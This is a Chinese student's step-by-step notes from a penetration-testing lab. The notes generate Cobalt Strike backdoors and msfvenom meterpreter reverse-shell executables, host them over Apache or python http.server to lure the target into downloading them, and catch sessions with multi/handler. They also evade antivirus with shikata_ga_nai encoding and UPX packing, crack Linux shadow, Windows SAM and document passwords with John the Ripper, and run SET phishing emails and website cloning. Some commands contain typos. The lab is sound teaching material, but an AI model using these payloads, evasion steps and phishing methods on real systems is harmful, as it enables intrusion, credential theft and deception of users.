目录
1利用Cobaltstrike生成攻击后门,通过两种网络共享下载该后门,运行后门后上线
利用Msfvenom生成木马,并进行免杀处理,再利用msfconsole进行监听
通过网页共享的方式,诱导目标主机下载payload病毒软件,从而获得目标控制权。
利用python命令实现以网页共享的方式,诱导目标主机下载payload病毒软件,从而获得目标控制权。
2.使用Windows的相关命令,查询并获取目标系统中的相关信息。
在Cobaltstrike中安装Ladon插件,并利用该插件进行常规的渗透测试与信息收集
分别使用John the Ripper和Johnny破解Linux系统密码;
一、
基本操作
- kali网路适配器选择桥接模式
- 主机命令提示符用ipconfig -all 查询主机ip地址等信息(看WLAN那一模块)【截图放试卷】
- 主机关闭实时保护(windows安全中心->病毒和威胁保护->”病毒和威胁防护”设置->关闭实时保护)
- 用powershell关闭防火墙(搜索powershell->以管理员身份运行->netsh advfirewall set allprofiles state off)
- 打开kali,用ifconfig查询kali机ip地址等信息
需要设置
1.方法为手动
2.ip,在本机ip的基础上,在最后三个数字的基础上加57,组成kali的ip地址
3.子网掩码和网关(根据在kali机查询到的信息填写)
4.DNS服务器(和网关相同)
- 保存后重启kali
- 在主机命令提示符ping kali机IP地址(要ping通)
- 在kali机ping主机ip地址(要ping通)
【出现问题可能是ip设置错误或防火墙问题(用powershell修改状态)】
若出现问题,修改防火墙状态
打开powershell,以管理员身份运行,查看版本
$psversiontable
更改执行策略并查看
set-executionpolicy unrestricted
get-executionpolicy
-
二、
-
安装并基本学习使用CobaltStrike
(1)在主机,解压cobaltstrike,将解压后的文件拖入kali机
(2)打开终端以root身份登录,切换到cs所在文件夹
输入 chmod 777 -R ./*
(3)输入 ./teamserver ip地址+密码,成功后保持打开状态(这里看端口号)
(4)打开另一个终端,切换到cs所在文件夹
输入./cobaltstrike
- 打开后修改主机,端口号,密码
- 获得本机控制权
(1)进入cs后,点击_cobalt strike,选择监听器,添加
(2)攻击->生成后门->payload生成器->选择添加的监听器,类型选择powershell
(3)生成后保存在home文件夹,在文件系统中找到home,找到payload文件,将其复制到主机桌面
(4)打开powershell,以管理员身份运行
(5).\切换到C盘
(6)./payload.ps1 运行程序
(7)再次打开cs,显示控制成功
三、
1利用Cobaltstrike生成攻击后门,通过两种网络共享下载该后门,运行后门后上线
- 在本机
生成后门见获得本机控制权
(1.1)命令提示符切换目录至cs所在文件夹,利用python开启简易http服务
(1.2)python -m http.server 4321
(1.3)在浏览器输入本机ip地址+ :4321,可看到cs4.5文件夹里内容
(2.1)在kali机打开/var/www/html/,找到index.html,将其复制到主机cs4.5所在文件夹
(2.2)再次在浏览器输入本机ip地址+ :4321
- 在kali机
(1.1)在kali切换目录至cs所在文件夹,利用python开启简易http服务
(1.2)python -m http.server 5432
(1.3)在本机浏览器和kali机浏览器输入kali机ip地址+ :5432,都能显示文件夹信息
(2.1)vim /etc/apache2/ports.conf 将端口号改为8080
(2.2)service apache2 start
(2.3)在kali浏览器输入kali机ip地址+ :80,显示成功
2利用Cobaltstrike生成攻击后门,通过“文件托管”进行网络共享下载该后门,运行后门后上线
(1)打开cs,查看监听器
(2)攻击->生成后门->windows可执行文件,生成一个文件
(3)攻击->web钓鱼->文件托管
- 生成链接,将其复制到主机浏览器下载到桌面,将后缀修改为exe,双击执行成功
四、
-
利用Msfvenom生成木马,并进行免杀处理,再利用msfconsole进行监听
(1)打开漏洞利用工具集metaspolit framework
- 输入密码进入matasploit
(3)命令行msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.121 lport=5656 -f exe -o wsr.exe 生成主机Ip为192.168.43.121和端口号为5656的命名为wsr的exe文件
(4)找到exe文件(一般在home文件夹里),将其拖入主机桌面
(5)输入命令行运用应用
use exploit/multi/handler
- 查看需要设置的主机Ip和端口号
options
- 输入命令行,定义lhost和lport,并run执行
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.43.212
set lport 5656
run
- 在win桌面双击启动wsr.exe文件,获得权限
- 利用建立的监听连接,进行渗透测试操作(上传、下载、提权、获取Wifi密码、拍照、监控屏幕、进程迁移、保持永久、修改文件日期等等)
ls查看桌面信息
run vnc 在kali里看到主机桌面
再次进入meterpreter,screenshot截图
getwd 输出工作目录
-
五、
-
通过网页共享的方式,诱导目标主机下载payload病毒软件,从而获得目标控制权。
命令行msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.121 lport=5656 -f exe -o flash.exe 生成主机Ip为192.168.43.121和端口号为5656的命名为flash的exe文件
输入命令行运用应用,定义lhost和lport,并run执行
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.43.212
set lport 5656
run
开启apache2服务
将生成的flash.exe文件用cp命令复制到html文件夹里
进入html文件夹,将原本的index.html文件移除
将新的index.html文件用cp命令从wsr文件夹复制到html文件夹,发现没有权限
用chmod 777 index.html获得权限,再次复制
在主机浏览器打开kali的ip地址下所存在的网页,用网页共享的方式诱导目标机下载flash.exe病毒软件
下载后双击运行,获取主机权限
-
六、
-
利用python命令实现以网页共享的方式,诱导目标主机下载payload病毒软件,从而获得目标控制权。
查看本机是否有python环境,在命令提示符输入python
在kali中切换到html文件夹,利用python命令开启网页共享服务
python -m http.server 789
在主机浏览器打开kali的ip地址下所存在的网页,用网页共享的方式诱导目标机下载flash.exe病毒软件
下载后双击运行,获取主机权限
七、
-
对payload文件进行编码操作
打开msfconsole
输入命令查看当前所有编码器,选择最优
msfvenom -l encoders 选择excellent的那个
生成payload文件
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.212 lport=9090 -f exe -o wsr.exe
生成一重编译20次的payload软件
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.212 lport=9090 -e x86/shikata_ga_nai -i 20 -f exe wsr1.exe
生成多重编码的payload文件
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.212 lport=9090 -e x86/shikata_ga_nai -i 20 -f row |msfvenom -a x86 --platform windows -e x85/countdown -i 10 -f raw -f exe -o wsr2.exe
将生成的三个病毒文件移入win系统,关闭实时保护
开始攻击
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.43.212
set lport 5656
run
双击wsr文件,获得控制权后退出
双击wsr1文件,获得控制权后退出
双击wsr2文件,获得控制权后退出
打开实时保护,三个文件都无法成功操作
2.对payload文件加壳
upx查看加壳工具的具体参数
对wsr文件进行加壳,文件大小变小了,压缩率为65.21%
upx -9 -q -o wsr4.exe wsr.exe
将文件拖入主机,开始攻击,可以获得主机控制权
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.43.212
set lport 5656
run
开启实时保护,仍可以获得主机控制权
八、
-
了解Windows提权的常见方法
2.使用Windows的相关命令,查询并获取目标系统中的相关信息。
九、
-
在Cobaltstrike中安装Ladon插件,并利用该插件进行常规的渗透测试与信息收集
打开cs4.5
生成windows可执行程序,并将其复制到windows系统
双击运行
获得控制权
右键,尝试获取密码
- 使用Ladon渗透测试工具进行内网渗透测试,并利用其相关功能辅助渗透攻击
将文件夹拖入c盘,打开ladon
点击powershell混淆,点击powershell->exe
显示isok
在c盘生成一个文件,打开如图
十、Johnny
-
分别使用John the Ripper和Johnny破解Linux系统密码;
使用john the Ripper
切换到~文件夹,先生成两个用户及各自的密码
cd ~
useradd test
useradd test1
合并passwd和shadow文件
unshadow /etc/passwd /etc/shadow >shadow.txt
破解密码并show
john -format=crypt shadow.txt
john -format=crypt shadow.txt --show
- 分别使用John the Ripper和Johnny破解Windows系统密码
reg save hklm\sam sam
reg save hklm\system system
将文件拖入kali
samdump2 system sam >win.txt 合并两文件
john --format=NT win.txt
john --format=NT win.txt --show
- 分别使用John the Ripper和Johnny破解word、Excel、rar、zip、pdf文档密码。
解压缩rocyou.txt.gz文件
cd /usr/share/john
sudo gunzip /usr/share/wordlists/rockyou.txt.gz
wc -l /usr/share/wordlists/rockyou.txt
利用/usr/sbin/unshadow执行文件来转换passwd和shadow文件
/usr/sbin/john --wordlist=/usr/share/wordlists/rockyou.txt --format=crypt ~/passwords.txt
查看目录下不同的转换工具
locate *2john
破解word文档密码
python office2john.py 1.docx >hash.txt
office2john 1.docx>hash.txt
john --wordlist=/usr/share/worldlists/rockyou.txt hash.txt
破解xlsx文件密码,因密码太复杂无法破解
python office2john.py 2.xlsx >hash.txt
office2john 2.xlsx>hash.txt
john --wordlist=/usr/share/worldlists/rockyou.txt hash.txt
破解rar文件密码
rar2john 3.rar >hash.txt
john --wordlist=/usr/share/worldlists/rockyou.txt hash.txt
破解zip文件密码
cd /usr/sbin
zip2john 1.zip >hashzip.txt
john hashzip.txt
破解pdf文件密码
locate pdf2john
cd /usr/share/john
./pdf2john.pl 5.pdf >hashpdf.txt
john hashpdf.txt
-
请参考The Social-Engineer Toolkit全模块讲解https://www.freebuf.com/sectool/339350.html,利用SET进行钓鱼邮件、钓鱼网站等社工攻击。
1.利用SET进行钓鱼邮件
在目录下打开社会工程学工具
用root权限进入后,选择1,社会工程攻击
选择1,鱼叉式网络钓鱼攻击载体
选择1,电子邮件攻击
使用DDL劫持攻击
选择攻击载荷
选择回连载荷
选择文件类型
设置邮箱,开始攻击
邮件发送成功,点击即可获取控制权
2.钓鱼网站攻击
在目录下打开社会工程学工具
打开学校官网
在菜单栏中选择社会工程攻击选项1
选择网络攻击选项2
选择网络劫持攻击方法选项5
选择网站克隆选项2
输入IP地址及想要克隆的网站
在win浏览器输入ip地址,网站获取成功
kali监听信息
!!!知识点
冒充管理员,骗取用户信任,并借此获取口令的攻击方式被称为密码猜测攻击
sudo为普通用户以root用户执行,cs是一个服务端,多个客户端
attrib是修改文件属性,modify是改文件夹,dir是查看文件夹
john the ripper:linux/win/execl口令
kali:渗透测试,口令破解,社会工程学(passwd、shadow(security、sysyem)用户及密码)
namp:漏洞扫描、端口扫描、操作系统扫描
chomd777/chomd771,metaspolit:expolit、payload、encoder
set适用于钓鱼和社工,网卡不能设置为交换和随机去暴露ip